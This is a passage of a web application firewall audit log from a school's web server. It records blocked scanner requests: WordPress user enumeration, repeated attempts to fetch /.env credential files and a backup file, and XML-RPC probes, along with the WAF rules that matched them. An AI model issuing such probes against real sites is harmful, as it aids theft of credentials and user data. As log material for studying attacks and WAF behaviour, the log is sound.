demo.sayHello --c09ff120-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c09ff120-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747527450995200 5144 (- - -) Stopwatch2: 1747527450995200 5144; combined=3682, p1=513, p2=2975, p3=30, p4=33, p5=78, sr=62, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c09ff120-Z-- --c542b035-A-- [18/May/2025:07:20:55 +0700] aCkn51ewLfDrCkDGIGxGewAAANY 103.236.140.4 60710 103.236.140.4 8181 --c542b035-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.13.208.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.13.208.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c542b035-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c542b035-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527655045840 2196 (- - -) Stopwatch2: 1747527655045840 2196; combined=1072, p1=302, p2=749, p3=0, p4=0, p5=21, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c542b035-Z-- --ddb1a42c-A-- [18/May/2025:07:24:08 +0700] aCkoqPypzAd0elWOk7og-AAAAAE 103.236.140.4 36766 103.236.140.4 8181 --ddb1a42c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.160.56.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.160.56.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ddb1a42c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddb1a42c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747527848481661 3061 (- - -) Stopwatch2: 1747527848481661 3061; combined=1321, p1=425, p2=867, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddb1a42c-Z-- --3bb89f41-A-- [18/May/2025:07:34:31 +0700] aCkrF_ypzAd0elWOk7olJAAAAA0 103.236.140.4 51134 103.236.140.4 8181 --3bb89f41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.183.203.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.183.203.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3bb89f41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bb89f41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747528471779664 15158 (- - -) Stopwatch2: 1747528471779664 15158; combined=26667, p1=437, p2=883, p3=0, p4=0, p5=12691, sr=114, sw=0, l=0, gc=12656 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bb89f41-Z-- --9e66450e-A-- [18/May/2025:08:30:38 +0700] aCk4PvypzAd0elWOk7o69QAAAAA 103.236.140.4 52650 103.236.140.4 8181 --9e66450e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.187 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9e66450e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e66450e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747531838010640 831 (- - -) Stopwatch2: 1747531838010640 831; combined=333, p1=290, p2=0, p3=0, p4=0, p5=43, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e66450e-Z-- --48024d37-A-- [18/May/2025:09:01:35 +0700] aCk_f1ewLfDrCkDGIGxcnQAAAMk 103.236.140.4 52810 103.236.140.4 8181 --48024d37-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.223.132.86 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --48024d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48024d37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747533695842067 791 (- - -) Stopwatch2: 1747533695842067 791; combined=347, p1=309, p2=0, p3=0, p4=0, p5=38, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48024d37-Z-- --a8996031-A-- [18/May/2025:10:29:57 +0700] aClUNUPRqak7bVuUS6cRTQAAAJY 103.236.140.4 53198 103.236.140.4 8181 --a8996031-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8996031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8996031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747538997081746 3375 (- - -) Stopwatch2: 1747538997081746 3375; combined=1512, p1=512, p2=966, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8996031-Z-- --71405626-A-- [18/May/2025:10:30:09 +0700] aClUQfypzAd0elWOk7o7MQAAAAE 103.236.140.4 53202 103.236.140.4 8181 --71405626-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71405626-C-- demo.sayHello --71405626-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71405626-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747539009786067 5035 (- - -) Stopwatch2: 1747539009786067 5035; combined=3794, p1=478, p2=3077, p3=22, p4=24, p5=110, sr=78, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71405626-Z-- --e57ce866-A-- [18/May/2025:10:36:56 +0700] aClV2EPRqak7bVuUS6cRUAAAAJQ 103.236.140.4 53216 103.236.140.4 8181 --e57ce866-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e57ce866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e57ce866-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747539416633884 3507 (- - -) Stopwatch2: 1747539416633884 3507; combined=1546, p1=571, p2=943, p3=0, p4=0, p5=32, sr=157, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e57ce866-Z-- --56029231-A-- [18/May/2025:10:37:05 +0700] aClV4VewLfDrCkDGIGxctAAAAMY 103.236.140.4 53220 103.236.140.4 8181 --56029231-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56029231-C-- demo.sayHello --56029231-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56029231-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747539425124886 6020 (- - -) Stopwatch2: 1747539425124886 6020; combined=4312, p1=571, p2=3508, p3=31, p4=35, p5=98, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56029231-Z-- --bfd13941-A-- [18/May/2025:10:42:02 +0700] aClXCvypzAd0elWOk7o7NQAAAAQ 103.236.140.4 53266 103.236.140.4 8181 --bfd13941-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bfd13941-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfd13941-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747539722327782 3319 (- - -) Stopwatch2: 1747539722327782 3319; combined=1445, p1=500, p2=912, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfd13941-Z-- --2863ef3d-A-- [18/May/2025:10:42:07 +0700] aClXD0PRqak7bVuUS6cRZQAAAJM 103.236.140.4 53270 103.236.140.4 8181 --2863ef3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2863ef3d-C-- demo.sayHello --2863ef3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2863ef3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747539727314565 5367 (- - -) Stopwatch2: 1747539727314565 5367; combined=4050, p1=558, p2=3279, p3=25, p4=25, p5=95, sr=106, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2863ef3d-Z-- --1ad86656-A-- [18/May/2025:10:52:28 +0700] aClZfPypzAd0elWOk7o7OgAAAAo 103.236.140.4 53328 103.236.140.4 8181 --1ad86656-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1ad86656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad86656-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747540348296987 3097 (- - -) Stopwatch2: 1747540348296987 3097; combined=1355, p1=496, p2=823, p3=0, p4=0, p5=35, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad86656-Z-- --1bc7d366-A-- [18/May/2025:10:52:33 +0700] aClZgUPRqak7bVuUS6cRbgAAAIk 103.236.140.4 53332 103.236.140.4 8181 --1bc7d366-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bc7d366-C-- demo.sayHello --1bc7d366-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bc7d366-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747540353571767 5826 (- - -) Stopwatch2: 1747540353571767 5826; combined=4255, p1=558, p2=3455, p3=29, p4=32, p5=109, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bc7d366-Z-- --40c0fe5b-A-- [18/May/2025:11:01:05 +0700] aClbgUPRqak7bVuUS6cRdQAAAJM 103.236.140.4 53382 103.236.140.4 8181 --40c0fe5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Accept-Charset: utf-8 --40c0fe5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c0fe5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747540865844850 888 (- - -) Stopwatch2: 1747540865844850 888; combined=366, p1=323, p2=0, p3=0, p4=0, p5=43, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c0fe5b-Z-- --340bb079-A-- [18/May/2025:11:01:13 +0700] aClbiRir-GlPrFVVKe5DhQAAAFg 103.236.140.4 53384 103.236.140.4 8181 --340bb079-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 Accept-Charset: utf-8 --340bb079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --340bb079-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747540873056682 869 (- - -) Stopwatch2: 1747540873056682 869; combined=317, p1=275, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --340bb079-Z-- --7c5fd153-A-- [18/May/2025:11:01:18 +0700] aClbjkPRqak7bVuUS6cRdgAAAIM 103.236.140.4 53394 103.236.140.4 8181 --7c5fd153-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --7c5fd153-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c5fd153-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747540878682321 801 (- - -) Stopwatch2: 1747540878682321 801; combined=313, p1=274, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c5fd153-Z-- --a0899e07-A-- [18/May/2025:11:50:54 +0700] aClnLvypzAd0elWOk7o7agAAAAg 103.236.140.4 53706 103.236.140.4 8181 --a0899e07-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:59.0.1) Gecko/20100101 Firefox/59.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 122874072 --a0899e07-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a0899e07-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854482855 2435 (- - -) Stopwatch2: 1747543854482855 2435; combined=746, p1=301, p2=414, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0899e07-Z-- --a0855342-A-- [18/May/2025:11:50:54 +0700] 